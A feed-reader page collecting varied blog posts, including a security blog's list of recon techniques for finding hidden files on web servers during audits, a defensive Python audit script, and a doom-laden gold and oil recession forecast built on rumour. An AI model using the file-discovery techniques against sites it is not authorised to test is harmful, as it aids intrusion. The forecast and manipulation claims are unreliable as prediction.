Shared posts

18 Apr 07:20

Shoplifting notice – improved

by Jasper
17 Apr 09:10

Pirate Bay Proxy Now Included in Secret ISP Blocklist

by Andy

Although they complain extremely loudly about piracy in the United States, the major record labels have never tried to have a domain blocked there.

Instead they’ve focused on countries around Europe and have achieved many of their site blocking successes through the UK High Court.

The blocks against The Pirate Bay, KickassTorrents, H33T and Fenopy (and before them Newzbin2) are controversial and widely circumvented, but perhaps of most concern is the way they are being implemented.

While the various and extremely detailed High Court rulings are available for public consumption, the actual list of domains being supplied by the record labels to the ISPs is not. This lack of transparency has done nothing to convince critics that there’s nothing to hide but through a series of coincidences, TorrentFreak discovered that perhaps there is.

Early last week The Pirate Bay switched to a new Greenland domain and within hours strange things began to happen. Many Pirate Bay proxy sites ceased to function and displayed ISP blocking pages instead, causing a flurry of emails from readers concerned that proxies were also becoming censorship targets.

Suspicious that the domain switch and the proxy problems were connected, TorrentFreak spoke with the operators of PirateReverse, one of the proxies that had ceased to function. In short, a technical issue with the way the new TPB domain was configured caused the proxies to pass information to the ISPs that they would not normally receive. This led to the proxies being blocked.

However, before we received this information we spoke to UK ISP Virgin Media to see if they were blocking the TPB proxies. We sent a list of URLs representing the apparently blocked sites and after a few days a spokesperson responded.

“We are only blocking those sites we are required to block by the court order,” we were told. “As a responsible ISP, Virgin Media supports the clear, legal framework put in place to protect against copyright infringement and we continue to comply with court orders specifically addressed to the company.”

However, it seems that at least one site not operated by The Pirate Bay is present on the High Court order and is currently being blocked.

“To clarify, http://tpb.voxanon.org/ is blocked as per the court order,” Virgin Media told TorrentFreak.

TorrentFreak asked Virgin if they were able to supply us with a full copy of the list of URLs they are being asked to block. We were told that they could not.

So, we moved onto the BPI, the organization supplying the URLs to the High Court and ISPs on behalf of the labels. We wrote to Director of Communications Adam Liversage and explained what we had discovered and again asked for a copy of the list. We received no response.

It is not in dispute that the High Court has found that The Pirate Bay, KickassTorrents, H33T and Fenopy contravene the Copyright Act and therefore should be blocked. Whether people like that or not, that’s a fact.

The big issue here is why the blocking list is being kept out of the public eye. The Voxanon site is indeed a Pirate Bay proxy, but there is no mention of that site in the High Court order and no ruling that it operates illegally. Beyond the concern that more sites will eventually creep onto this list, it raises the specter of more blocklists being created in future, again with no public accountability.

If there’s to be any confidence that these High Court orders are in the public interest, then there’s nothing to hide. And, let’s face it, if all the list contains is a rundown of domains owned by these sites it’s not going to make exciting reading. So why not publish the list?

Source: Pirate Bay Proxy Now Included in Secret ISP Blocklist

17 Apr 14:53

Shodan, the scariest search engine on the Internet

by LUK
“When people can't find something on Google, they think nobody can find it. That's false.”

The observation comes from John Matherly, creator of Shodan, the scariest search engine on the Internet.
Unlike Google, which concentrates on searching websites, Shodan is a kind of “dark” search engine that detects servers, webcams, printers, routers and everything else that connects to and makes up the Internet.

Shodan runs continuously and collects information on some 500 million connected devices and services every month. And the search results are surprising: from traffic lights to security cameras, by way of heating systems and crematoria.

Shodan users have also found control systems for a water park and a petrol station. And computer security researchers have located command and control systems for nuclear plants and a particle accelerator using Shodan.

But what draws attention to Shodan, and what makes it so chilling, is that very few of these devices have any security restrictions on accessing them.

“You can access practically half the Internet with a default password,” said HD Moore, chief security officer at Rapid7, which runs a service similar to Shodan for customers. “It's a massive security failure,” he added. Countless printers, servers and devices have “admin” or “1234” as their password. And, in fact, most connected systems do not ask for any credentials at all to control them.

In a talk at the Defcon security conference, the expert Dan Tentler demonstrated how he used Shodan to find control systems for air conditioners, water heaters and garage doors.

He found a hockey rink that could be defrosted with the push of a button. One city's traffic system was connected to the Internet and could be manipulated by entering a simple code. And he also found a control system for a hydroelectric plant in France with two turbines generating three megawatts each.
The problem, of course, would be all of this falling into the wrong hands.

“The damage could be very serious,” said Tentler.

The good news is that Shodan's purpose is a different one.
Matherly, who completed Shodan three years ago as a personal project, has limited searches to just ten results for unregistered users and fifty for registered ones. And if you want to see everything Shodan has to offer, Matherly asks for a paid subscription and more information about your objective.

Shodan's main users are security experts, academic researchers and government agencies. The “bad guys” can use it as a starting point, Matherly admits, but “cybercriminals” usually have access to botnets (groups of infected computers) that achieve the same purpose without being detected.
To date, most computer attacks have concentrated on stealing money and intellectual property, not on causing damage by blowing up a building or switching off a city's traffic lights.

For now, security professionals hope to avoid this scenario by detecting these insecure devices and services with Shodan and alerting those who operate them to their vulnerability.

Do you trust Shodan's good intentions? Tell us!

via CNN
18 Apr 04:39

The 118xx number scam and Google

by Yago Jesus
Our dependence on Google these days is undeniable; many people don't even bother to type the URL of well-known services, they simply type 'facebook' into the search bar and wait for Google to give them the link.
Google, while being the most used search engine (or maybe because of it), is the victim of many 'rogues' who strive to find gaps through which to slip their scam.
Today we're going to talk about the 118xx telephone numbers. In principle they are just directory-enquiry numbers, the kind that proliferated when the friendly, free, old-fashioned 1003 was discontinued, and they have a rather high per-call cost.
Like the rest of the premium-rate numbers, they live off providing supposedly 'very useful' information and charging a fortune for it.
So far, nothing to object to: if someone is generous enough to use that number to find information that can be found in a search engine, great.
The problem comes when you deceive people, when you swindle them and when you try to profit by taking advantage of the unwary.
Yesterday I needed to find the customer service number of a certain operator, and lazy as I am, I typed into Google:
'telefónica atención al cliente'
and, surprise! This is what I found

As can be seen, we find that a few 'smart guys' have bought ads on Google so that it shows their premium-rate numbers as the first result. Take that!
In this case we find 11847. Well, here, in an exercise in pure sophistry, one might think that maybe 'telefónica' is a very generic term and, fairly enough, 'telefónica atención al cliente' could perhaps be interpreted as generic 'telephone customer service'. Fine, OK.
What if we search for another one? Let's see

Oh no! Now there is no doubt whatsoever; blatantly, when searching for Yoigo's customer service number we find 11834 in first place and, further down as the third result, 11874.
I have no doubt left: scam in sight. In fact, if we visit one of those links, we find something like:

I think words are unnecessary. Personally, I understand that this is set up this way to generate confusion and make people call and fall victim to a scam. In fact, if you google those numbers you find things like this:

If I were Telefónica, Yoigo, ONO or any other operator, I would already be taking action on the matter.
18 Apr 05:30

Techniques for discovering the files of a website, part 1 of 2

by noreply@blogger.com (Maligno)
One of the things that must be done during an audit is to find out which files exist on the web server, since any one of them may hold the key that opens the can. For that there is a wide variety of ways to try to find all the folders and files on the web server that are "hidden" from plain sight. Finding them is a fun game, similar to looking for the pieces of a puzzle that let you see the whole picture hiding behind the original domain name, and the ways are many.

Many of these techniques are implemented in FOCA, others are not, and since I want them to be implemented, this past weekend I spent some time compiling them all into a list that turned out a bit long, so I am going to publish it for you in a couple of posts. These are all of them:

1.- Crawling

The first and most obvious is to read the source code of a site's web pages and follow all the links that can be extracted from them. This is something we traditionally do with Burp Suite, since we can connect the URL search with FOCA's tests. The spidering module is good enough to produce a file with all the paths to a site's files.

Figure 1: Spidering with Burp

2.- Robots.txt

These files store paths to documents and folders, so in case the crawling has not found them all, it is worth giving them a read to see what shows up there. Sometimes surprising paths can appear, as we saw with RTVE's robots.txt, or curious ones like the famous robots.txt of the Casa Real (the Spanish Royal Household).

3.- Sitemap.xml

Sitemap.xml files also collect a site's files and content. They are generally public URLs with information to improve the indexing that search engines do of a site. It is worth extracting these URLs and feeding them to the crawling engine, in case the system stopped before locating one of those addresses.

Figure 2: The Casa Real sitemap.xml as of today

4.- Search engines

Search engines may index URLs that reached their database through a direct link placed on some other page (remember the case of the persistent Google XSS) or because some browser toolbar, or Google Chrome itself, reported that URL, as in the case of Blogger and predicting the future, or the Bank of America sofa. The files indexed by search engines must be reviewed. In addition, an old misconfiguration of a site may have been used to index the files, and they remain in the search engine's database. Of course, quick targets can be found with the 'slash' trick in Google.

5.- Directory Listing

Of course, every folder in every URL must be reviewed to find those that may have directory listing open. This is the best of the options, since it lets you see everything in a folder without needing to search any further.

6.- .listing files

.listing files, which are created by wget, are an ls -la of the folder where certain files were uploaded to or downloaded from. Although they need not match what is actually in that directory, they do yield many URLs that should be tested.

Figure 3: Appearance of a .listing file

7.- .DS_Store files

The .DS_Store files generated by the infamous Mac OS X Finder have proven to be a juicy source of information for obtaining the files and folders of a directory, as we saw this week with the DS_Store program.

8.- Thumbs.db files

Thumbs.db files also store file names (and miniatures) of the thumbnails associated with files in Windows XP or Windows 2003. To analyse Thumbs.db files you can use the online service that has been available for a long time at Informática64, called Thumbando.

Figure 4: Thumbando output when given a Thumbs.db

9.- Source code repositories of websites

Files recording what was uploaded and/or updated in each commit by a developer usually remain in them. Systems such as Subversion or BuildBot can be genuine sources of information for learning what lies hidden on a website, where our friend .SVN/Entries and its wc.db database, together with the pristine directory, are a real gift in an audit.

10.- 404 error files

Error messages can also leak internal paths or paths of the website. Among them, it is worth remembering the 404 error messages in ASP applications migrated to IIS 7, or the 404 error messages in WebDNA TCL documents.

Figure 5: Paths in an IIS 404 error message with ASP

That's the first 10 places to look; the second part has another good batch of places and ways to find the URLs that lead us to the file names, so as to find the ones that are juicy files.
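Most of the sources in this list (robots.txt, sitemap.xml, wget's .listing, .DS_Store, Thumbs.db, .svn) are metadata a site publishes about itself, so the same parsing works in reverse as a pre-deployment check on your own document root: extract every path these files expose and flag the ones that should never be served. The following Python is an added example written for this page, not code from the original post or from FOCA; it parses constructed sample inputs (the robots.txt, sitemap and .listing content are invented, and example.com is a placeholder) and the artifact rules simply encode the file types named in the list above.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# --- Constructed sample inputs (invented for this example, not real sites) ---
ROBOTS_TXT = """\
# constructed robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/db_dump.sql
Allow: /public/
Disallow:
Sitemap: https://www.example.com/sitemap.xml
"""

SITEMAP_XML = """\
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://www.example.com/</loc></url>
  <url><loc>https://www.example.com/docs/report.pdf</loc></url>
  <url><loc>https://www.example.com/images/.DS_Store</loc></url>
</urlset>
"""

# A .listing file is the "ls -la" output that wget leaves behind.
LISTING = """\
drwxr-xr-x  3 www www 4096 Apr 17 09:10 .
drwxr-xr-x 12 www www 4096 Apr 17 09:10 ..
-rw-r--r--  1 www www 2048 Apr 16 18:03 Thumbs.db
-rw-r--r--  1 www www 9120 Apr 15 11:00 old config.php.bak
lrwxrwxrwx  1 www www   11 Apr 15 11:00 current -> release-3
"""

SITEMAP_NS = "{http://www.sitemaps.org/schemas/sitemap/0.9}"

# File-name patterns for the leak sources named in the post: metadata a
# deployment should never serve. Matched against the lower-cased path.
ARTIFACT_RULES = [
    (re.compile(r"(^|/)\.ds_store$"), "Finder .DS_Store lists directory contents"),
    (re.compile(r"(^|/)thumbs\.db$"), "Thumbs.db stores file names and thumbnails"),
    (re.compile(r"(^|/)\.listing$"), ".listing is an ls -la left behind by wget"),
    (re.compile(r"(^|/)\.(svn|git|hg)(/|$)"), "version-control metadata (entries, wc.db, pristine/)"),
    (re.compile(r"(\.(bak|old|orig|swp|sql)|~)$"), "backup, dump or editor leftover"),
]


def paths_from_robots(text):
    """Return {'paths': [...], 'sitemaps': [...]} from robots.txt content."""
    paths, sitemaps = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if ":" not in line:
            continue
        field, _, value = line.partition(":")    # split at the FIRST colon only
        field, value = field.strip().lower(), value.strip()
        if field in ("disallow", "allow") and value:   # empty Disallow: means nothing
            paths.append(value)
        elif field == "sitemap" and value:
            sitemaps.append(value)
    return {"paths": paths, "sitemaps": sitemaps}


def paths_from_sitemap(xml_text):
    """Return the URL paths listed in a sitemap.xml document."""
    root = ET.fromstring(xml_text)
    return [urlsplit(loc.text.strip()).path for loc in root.iter(SITEMAP_NS + "loc")]


def names_from_listing(text):
    """Parse ls -la style lines (a wget .listing file) into entry names."""
    names = []
    for line in text.splitlines():
        parts = line.split(None, 8)              # name is the 9th field and may contain spaces
        if len(parts) < 9 or parts[0] == "total":
            continue
        name = parts[8]
        if parts[0].startswith("l") and " -> " in name:
            name = name.split(" -> ", 1)[0]      # symlink: keep the link name only
        if name not in (".", ".."):
            names.append(name)
    return names


def flag_artifacts(paths):
    """Return (path, reason) for every path that matches an artifact rule."""
    flagged = []
    for path in paths:
        for rule, reason in ARTIFACT_RULES:
            if rule.search(path.lower()):
                flagged.append((path, reason))
                break
    return flagged


def audit_sources(robots_txt, sitemap_xml, listing_txt):
    """Merge the three sources and report which exposed paths are artifacts."""
    discovered = (paths_from_robots(robots_txt)["paths"]
                  + paths_from_sitemap(sitemap_xml)
                  + names_from_listing(listing_txt))
    return flag_artifacts(discovered)


if __name__ == "__main__":
    for path, reason in audit_sources(ROBOTS_TXT, SITEMAP_XML, LISTING):
        print(f"{path}: {reason}")
```

Run against a real document root, the three string constants would be replaced by the contents of the site's own robots.txt, sitemap.xml and any .listing files found on disk; anything the audit flags is either removed before deployment or denied at the web server, and the sitemap entries it reports are the first candidates for the crawler described in step 1.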

Saludos Malignos!
18 Apr 06:09

Confessions of a pirated author

by Marcos Taracido

Articles: Marcos Taracido

There are, in my opinion, contradictions and half-truths in this text by Daniel Cassany, but also quite a lot of common sense and several things one can learn from: Confessions of a pirated author.

«Of course, I notified my publishers, who wrote to the American administrator of the repository, and within a few days those copies had been removed. But months later others had been uploaded. In other words, this is like warts: you burn them off but they grow back. Some of my publishers have hired the services of a company ("extremely expensive", they say) to clean up the net, but it does not seem to be very effective.
Resigned, I have started collecting "pirate versions" of my texts. I have a folder for each book. There are all kinds: complete and partial, scanned from an original or typed up with a word processor, with various marks of origin, in various formats (PDF, Word, photo). I cannot get over my astonishment. I add sarcasm because I do not want to draw blood, nor am I interested in paranoia.»

18 Apr 06:09

How the Computers Exploded

by Marcos Taracido

Articles: Marcos Taracido

Jim Holt reviews an essay that tells the origin of computers, and does it in such a way that it serves equally as a perfect summary for not reading the book or as a spur to rush out and buy it: How the Computers Exploded.

«It was not only the military impetus behind the project that aroused opposition at the Institute. Many thought that such a monster, capable of performing that number of calculations, whatever its purpose, had no place in what had been conceived as a kind of Platonic paradise for scholarship and pure knowledge. The Institute for Advanced Study was founded in 1930 by the brothers Abraham and Simon Flexner, philanthropists and educational reformers. The money came from Louis Bamberger and his sister, Caroline Bamberger Fuld, who sold their stake in the Bamberger department store chain to Macy's in 1929, a few weeks before the stock market crash.»

17 Apr 13:08

Notes on the History of Lines: Sight Lines

by John F. Ptak

JF Ptak Science Books | Quick Post | History of Lines

These are particularly fine and relatively early printed images depicting a specific kind of line of sight: this one is a positioning line, rather than a line of sight in fire control, radial velocity, EM radiation or acoustic wave propagation, or targeting. This instrument was used to establish an imaginary line through perceived objects.

This is a detail from Andrew Wakley's The mariner's compass rectified: containing tables, shewing the true hour of the day, the sun being upon any point of the compass; with the true time of the rising and setting of the sun and stars, and the points of the compass upon which they rise and set ... With the description and use of those instruments most in use in the art of navigation. Also a table of the latitudes and longitudes of places, published in 1763 and reprinted many times after that. (Full text is available from Google Books and also from the HathiTrust, which offers a text version of the book as well.)

The full page from which the detail is drawn:

[Image: full page from Wakley's The mariner's compass rectified]

There is a certain continuum in developing sight lines that comes to mind, as with this famous image drawn by Leonardo in 1508, perhaps the first modern interpretation of how the eye functions, kept privately in manuscript, the result of theory and experimentation:

[Image: Leonardo's drawing of the eye, 1508]

Which leads us to the sight lines of Albrecht Dürer, illustrating (some 17 years later) the use of a perspective tool, the vielo, in his work The Drawing Manual published in 1525:

http://www.oneonta.edu/faculty/farberas/arth/Images/ARTH_214images/Durer/durer_perspnude_large.jpg

 

The quadrant is a tool used to determine position and time: a tool divided into four segments (hence the "quad" part, the fourth part of a circle, just as the sextant was a sixth part, its arc spanning 60°).

And just for the record, here are Ptolemy's eyes, looking through his sextant, which he (probably) developed to replace the astrolabe:

[Images: Ptolemy observing with his instrument, two views]
This fine image of a fore-staff (back-staff) is also found in the book, a navigational and positional tool that was replaced by the sextant:

17 Apr 22:11

History Tells Us That A Gold Crash + An Oil Crash = Guaranteed Recession

by Michael

Is the United States about to experience another major economic downturn?  Unfortunately, the pattern that is emerging right now is exactly the kind of pattern that you would expect to see just before a major stock market crash and a deep recession.  History tells us that when the price of gold crashes, a recession almost always follows.  History also tells us that when the price of oil crashes, a recession almost always follows.  When both of those things happen, a significant economic downturn is virtually guaranteed.  Just remember what happened back in 2008.  Gold and oil both started falling rapidly in July, and in the fall we experienced the worst financial crisis that the U.S. had seen since the days of the Great Depression.  Well, a similar pattern seems to be happening again.  The price of gold has already crashed, and the price of a barrel of WTI crude oil has dropped to $86.37 as I write this.  If the price of oil dips below $80 a barrel and stays there, that will be a major red flag.  Meanwhile, we have just seen volatility return to the financial markets in a big way.  When volatility starts to spike, that is usually a clear sign that stocks are about to go down substantially.  So buckle your seatbelts - it looks like things are about to get very, very interesting.

Posted below is a chart that shows what has happened to the price of gold since the late 1960s.  As you will notice, whenever the price of gold rises dramatically and then crashes, a recession usually follows.  It happened in 1980, it happened in 2008, and it is happening again...

The Price Of Gold

A similar pattern emerges when we look at the price of oil.  During each of the last three recessions we have seen a rapid rise in the price of oil followed by a rapid decline in the price of oil...

The Price Of Oil

That is why what is starting to happen to the price of oil is so alarming.  On Wednesday, Reuters ran a story with the following headline: "Crude Routed Anew on Relentless Demand Worries".  The price of oil has not "crashed" yet, but it is definitely starting to slip.

As you can see from the chart above, the price of oil has tested the $80 level a couple of times in the past few years.  If we get below that resistance and stay there, that will be a clear sign that trouble is ahead.

However, there is always the possibility that the recent "crash" in the price of gold might be a false signal because there is a tremendous amount of evidence emerging that it was an orchestrated event.  An absolutely outstanding article by Chris Martenson explained how the big banks had been setting up this "crash" for months...

In February, Credit Suisse 'predicted' that the gold market had peaked, SocGen said the end of the gold era was upon us, and recently Goldman Sachs told everyone to short the metal.

While that's somewhat interesting, you should first know that the largest bullion banks had amassed huge short positions in precious metals by January.

The CFTC rather coyly refers to the bullion banks simply as 'large traders,' but everyone knows that these are the bullion banks.  What we are seeing in that chart is that out of a range of commodities, the precious metals were the most heavily shorted, by far.

So the timeline here is easy to follow.  The bullion banks:

  1. Amass a huge short position early in the game
  2. Begin telling everyone to go short (wink, wink) to get things moving along in the right direction by sowing doubt in the minds of the longs
  3. Begin testing the late night markets for depth by initiating mini raids (that also serve to let experienced traders know that there's an elephant or two in the room)
  4. Wait for the right moment and then open the floodgates to dump such an overwhelming amount of paper gold and silver into the market that lower prices are the only possible result
  5. Close their positions for massive gains and then act as if they had made a really prescient market call
  6. Await their big bonus checks and wash, rinse, repeat at a later date

While I am almost 100% certain that any decent investigation by the CFTC would reveal that market manipulating 'dumping' was happening, I am equally certain that no such investigation will occur.  That's because the point of such a maneuver by the bullion banks is designed to transfer as much wealth from 'out there' and towards the center, and the CFTC is there to protect the center's 'right' to do exactly that.

You can read the rest of that article right here.

There are also rumors that George Soros was involved in driving down the price of gold.  The following is an excerpt from a recent article by "The Reformed Broker" Joshua Brown...

And over the last week or so, the one rumor I keep hearing from different hedge fund people is that George Soros is currently massively short gold and that he's making an absolute killing.

Once again, I have no way of knowing if this is true or false.

But enough people are saying it that I thought it worthwhile to at least mention.

And to me, it would make perfect sense:

1. Soros is a macro investor, this is THE macro trade of the year so far (okay, maybe Japan 1, short gold 2)

2. Soros is well-known for numerous market aphorisms and neologisms, one of my faves being "When I see a bubble, I invest."  He was heavily long gold for a time and had done well while simultaneously referring to it publicly as a speculative bubble.

3. He recently reported that he had pretty much exited the trade in gold back in February. In his Q4 filing a few weeks ago, we found out that he had sold down his GLD position by about 55% as of the end of 2012 and had just 600,000 shares remaining. That was the "smartest guy in the room" locking in a profit after a 12 year bull market.

4. Soros also hired away one of the most talented technical analysts out there, John Roque, upon the collapse of Roque's previous employer, broker-dealer WJB Capital. No one has heard from the formerly media-available Roque since but we can only assume that - as a technician - the very obvious breakdown of gold's long-term trend was at least discussed. And how else does one trade gold if not by using technicals (supply/demand) - what else is there? Cash flow? Book value?

5. Lastly, the last public interview given by George Soros was to the South China Morning Post on April 4th. He does not mention any trading he's doing in gold but he does reveal his thoughts on it having been "destroyed as a safe haven"

It is also important to keep in mind that this "crash" in the price of "paper gold" had absolutely nothing to do with the demand for physical gold and silver in the real world.  In fact, precious metals retailers have been reporting that they have been selling an "astounding volume" of gold and silver this week.

But that isn't keeping many in the mainstream media from "dancing on the grave" of gold and silver.

For example, New York Times journalist Paul Krugman seems absolutely ecstatic that gold has crashed.  He seems to think that this "crash" is vindication for everything that he has been saying the past couple of years.

In an article entitled "EVERYONE Should Be Thrilled By The Gold Crash", Business Insider declared that all of us should be really glad that gold has crashed because according to them it is a sign that the economy is getting better and that faith in the financial system has been restored.

Dan Fitzpatrick, the president of StockMarketMentor.com, recently told CNBC that people are "flying out of gold" and "getting into equities"...

"There have been so many reasons, and there remain so many reasons to be in gold," Fitzpatrick said, noting currency debasement and the fear of inflation. "But the chart is telling you that none of that is happening. Because of that, you're going to see people just flying out of gold. There's just no reason to be in it.Traders are scaling out of gold and getting into equities."

Personally, I feel so sorry for those that are putting their money in the stock market right now.  They are getting in just in time for the crash.

As CNBC recently noted, a very ominous "head and shoulders pattern" for the S&P 500 is emerging right now...

A scary head-and-shoulders pattern could be building in the S&P 500, and this negative chart formation would be created if the market stalls just above current levels.

"It's developing and it's developing fast," said Scott Redler of T3Live.com on Wednesday morning.

Even worse, volatility has returned to Wall Street in a huge way.  This is usually a sign that a significant downturn is on the way...

Call options buying recently hit a three-year high for the CBOE's Volatility Index, a popular measure of market fear that usually moves in the opposite direction of the Standard & Poor's 500 stock index.

A call buy, which gives the owner the option to purchase the security at a certain price, implies a belief that the VIX is likely to go higher, which usually is an ominous sign for stocks.

"We saw a huge spike in call buying on the VIX, the most in a while," said Ryan Detrick, senior analyst at Schaeffer's Investment Research. "That's not what you want to hear (because it usually happens) right before a big pullback."

The last time call options activity hit this level, on Jan. 13, 2010, it preceded a 9 percent stock market drop that happened over just four weeks, triggered in large part by worries over the ongoing European debt crisis.

And according to Richard Russell, the "smart money" has already been very busy dumping consumer stocks...

What do billionaires Warren Buffett, John Paulson, and George Soros know that you and I don't know? I don't have the answer, but I do know what these billionaires are doing. They, all three, are selling consumer-oriented stocks. Buffett has been a cheerleader for US stocks all along.

But in the latest filing, Buffett has been drastically cutting back on his exposure to consumer stocks. Berkshire sold roughly 19 million shares of Johnson and Johnson. Berkshire has reduced his overall stake in consumer product stocks by 21%, including Kraft and Procter and Gamble. He has also cleared out his entire position in Intel. He has sold 10,000 shares of GM and 597,000 shares of IBM.

Fellow billionaire John Paulson dumped 14 million shares of JP Morgan and dumped his entire position in Family Dollar and consumer goods maker Sara Lee. To wrap up the trio of billionaires, George Soros sold nearly all his bank stocks including JP Morgan, Citigroup and Goldman Sachs. So I don't know exactly what the billionaires are thinking, but I do see what they're doing -- they are avoiding consumer stocks and building up cash.

... the billionaires are thinking that consumption is heading down and that America's consumers are close to going on strike.

So what are all of those billionaires preparing for?

What do they know that we don't know?

I don't know about you, but when I start putting all of the pieces that I have just discussed together, it paints a rather ominous picture for the months ahead.

At some point, there will be another major stock market crash.  When it happens, we will likely see even worse chaos than we saw back in 2008.  Major financial institutions will fail, the credit markets will freeze up, economic activity will grind to a standstill and millions of Americans will lose their jobs.

I sincerely hope that we still have at least a few more months before that happens.  But right now things are moving very rapidly and it is becoming increasingly clear that time is running out.

Time Is Running Out

18 Apr 08:23

Manipulation of information from the media to the masses?...



Manipulation of information from the media to the masses? What manipulation are you talking about?

17 Apr 04:20

Mundo Hacker on Discovery Max

by noreply@blogger.com (Maligno)
As you know, Mundo Hacker is being broadcast on Discovery Max. I took part for a few minutes in Episode 3, devoted to cyberwar, and since it has already been published on the Internet, here it is for you to watch.

If you want to know more about this topic, I have compiled some cyberwar and cyberespionage incidents in an article. You can also watch the other episodes of Mundo Hacker from Discovery Max on Flu-Project, and in the early hours of Thursday to Friday this week you will be able to watch the next one.

Saludos Malignos!
16 Apr 16:38

Why I have stopped collaborating with TEDxCibeles

by Sara D'Eustacchio
Reblogged from álvaroSarasúa: http://www.youtube.com/watch?v=2r1W8HtB-ic "Let's stop being so damn respectful" Richard Dawkins at TED. A couple of months ago I started collaborating as a blogger at TEDxCibeles. For those of you who don't know TED, it is a non-profit organisation that creates meeting spaces to share "ideas worth spreading" (Ideas Worth Spreading). The TEDx […]
17 Apr 18:01

Large Scale Botnet Brute Force Password Cracking Against WordPress Sites

by Darknet
There have always been a lot of brute force attempts/bot scans and hacking attempts on WordPress hosted sites (due to flaws in the core and a multitude of insecure plugins) – this site being no exception (they’ve even done some minor damage before). But things appear to have really ramped up recently with a large [...] The post Large...

Read the full post at darknet.org.uk
17 Apr 06:31

Redesign aimed at error prevention

by torresburriel

One of the fundamental premises on which I base my work, when someone asks me to advise them on what actions to take to improve the user experience of a digital product, is to look at the possible errors that can occur while using it. This is no wonderful secret: Nielsen's traditional heuristics already name error prevention as a fundamental element of website usability.

I have to say that over time one acquires certain habits when observing, and whatever the reality being observed, one always ends up identifying elements that could be modified so that error prevention is present in the design of things. I insist: whatever their nature.

A good model is the visual example I bring you this time. It was shown to me in Seville, in one of those bars for tourists in the centre of the Andalusian capital (where, by the way, we had 5 beers and 5 tapas of anchovies and were charged 5 euros).

Cigarette machine redesign
Cigarette machine redesigned to prevent petty theft

The story of this redesign (very much in the lean spirit) of the cigarette machine is as follows. Traditionally, what people do in bars when they come in wearing a coat or jacket is take it off and leave it wherever they can. If the bar has no coat hooks, as in this case, or not enough of them, a good place to leave the coat is on top of the cigarette machine.

What risk does this practice pose? That at times when the bar is crowded, with the consequent pile of coats left on top of the cigarette machine, light-fingered types may do their work and steal one.

What does this reality mean? Besides the anger and upset of the people whose coats may have been stolen, the bar staff, at a certain point, warn customers not to leave their coats on top of the cigarette machine, to avoid the possibility that in a moment of distraction one gets taken. That is already an action aimed at error prevention, but it does not scale. The bar staff have to be there every day, at every hour there are customers, issuing that warning.

Solution? The one seen in the photograph. The design of the cigarette machine is modified so that it is physically impossible to leave any object on top of it. And if there are no objects, the light-fingered types (who exist everywhere) have nothing to work with.

Simple and effective.

17 Apr 09:02

My favourite writer, that jerk

by Ricardo J. G.


When I published my first book, some friends asked me who had really written it. They ruled out that it could be the same guy they remembered leaving some bar with in worse shape than George Clooney after his binge with Tarantino in From Dusk Till Dawn. The disappointment of those close to me confirmed that Reinaldo Arenas was right: it is better to read writers from a distance and not to meet them personally, "because one can suffer terrible disappointments".

The Cuban author's remark predates the Internet, when certain distances were still kept and readers were content with a signature at the Book Fair. These days they want a friendship on Facebook, to share holiday photos and advice for their wedding anniversary. To socialise a bit, in short. There must be poets who don't leave the house for fear of disappointing fans who expect to be greeted with a sonnet.

Kapuściński maintained that to be a good journalist you have to be a good person, but nothing suggests that this is an indispensable condition for producing good fiction. Even before this social free-for-all of the writer, we learned that Tolstoy mistreated his wife while finishing Anna Karenina. Readers of García Márquez have watched over the years as the Colombian Nobel laureate preferred the company of Fidel Castro to the commitment of defending the freedom of Cubans. Vargas Llosa has his own list of embarrassments, including that surreal attempt to become president of Peru. And who would have guessed, reading him, that Günter Grass was hiding a Nazi past?

The blame for so much disappointment lies not with the authors but with readers who insist on identifying them with the most virtuous of their characters, forgetting that only a complex personality can produce the best literature. You know, far from the simplicities of a world divided into good and evil. Tolstoy could surely write War and Peace because both worlds coexisted inside him. To meet him in dressing gown and slippers, vodka bottle in hand, in a Russian dacha? It would probably have led to one of those "terrible disappointments" Arenas spoke of.

I know what it is to discover that one of your go-to authors is not what you would like him to be. Some years ago now, Ángel Fernández Fermoselle, the editor of Kailas, introduced me to the exceptional work of Mo Yan, the latest Nobel laureate in Literature. The Chinese author is an affable, shy man, even likeable. Oh, and a member of the Chinese Communist Party (CCP), which sends thousands of people to re-education camps, executes more prisoners than the rest of the world put together and censors hundreds of Mo's fellow writers, when it doesn't lock them in isolation cells.

On the eve of his speech at the Swedish Academy, the Chinese laureate was asked about the suppression of press freedom in his country and he more or less said that these were things that happened everywhere. Is it possible that a writer capable of masterpieces like The Garlic Ballads does not see the difference between China and Spain, where one can tear into one's prime minister (I'll take the chance: Rajoy strikes me as a bit of a dimwit) without spending 20 years in a gulag? I think it is not possible, so I can only conclude that Mo keeps quiet about the abuses of the Chinese regime out of ideological affinity, self-interest or cowardice, not because he has said it all in his books, as he claims. When I listen to him I'm tempted to burn his books on a bonfire, but then I think again and tell myself that taking literature so personally is only excusable in adolescence. I prefer the distance that lets me keep reading my favourite writer, that jerk.

17 Apr 16:20

I've got the badges ready for Félix @lajamoneria #Retromañía

15 Apr 15:02

Decimals, Holes & Dots in the History of Mathematics

by John F. Ptak

JF Ptak Science Books   Post 2011

There is an interesting side note to this blog's series on the histories of holes and dots--a mathematical aspect involving decimal points, decimal notation and placeholders.  This is exclusive of the number zero, however, which is an entirely different topic. 

 

[Image: Gregor Reisch, Margarita Philosophica (1503)]

The book in which this beautifully-illustrated counting board (below) is found is Gregor Reisch's (1467-1525) Margarita Philosophica (1503), which depicts (amidst much else in that greatly humanist volume) the mathematicians Boethius and Pythagoras working problems on the tools of their day. The tools on the right seem to be circles, but they're not--they're counting stones, and for our purposes here they shall be dots; in the history of dots in math and business reckoning they have had a long and strong life.

[Image: Boethius and Pythagoras at their counting tools, from Reisch's Margarita Philosophica]

We can see in his expression that Boethius, on the left, is rather enjoying himself, knowing the superiority of his system of counting, which was the Hindu-Arabic number notation--he definitely has a sly, self-appreciating smile on his face.  Pythagoras, working with the old counting table, definitely looks worried, or at least unhappy, unsettled.  Never mind that Pythagoras (570-495 b.c.e., none of whose works exist in the original, another sort of entry in our Blank History category) was at a definite disadvantage in the calculating department, being dead and all that for hundreds of years before the Arabic notation was more widely introduced in the West, probably by Pisano/Fibonacci in the early 13th century.  But it does fall to Boethius, the smirker, to have introduced the digits into Europe for the very first time, deep into the history of the Roman Empire, in the 6th century.

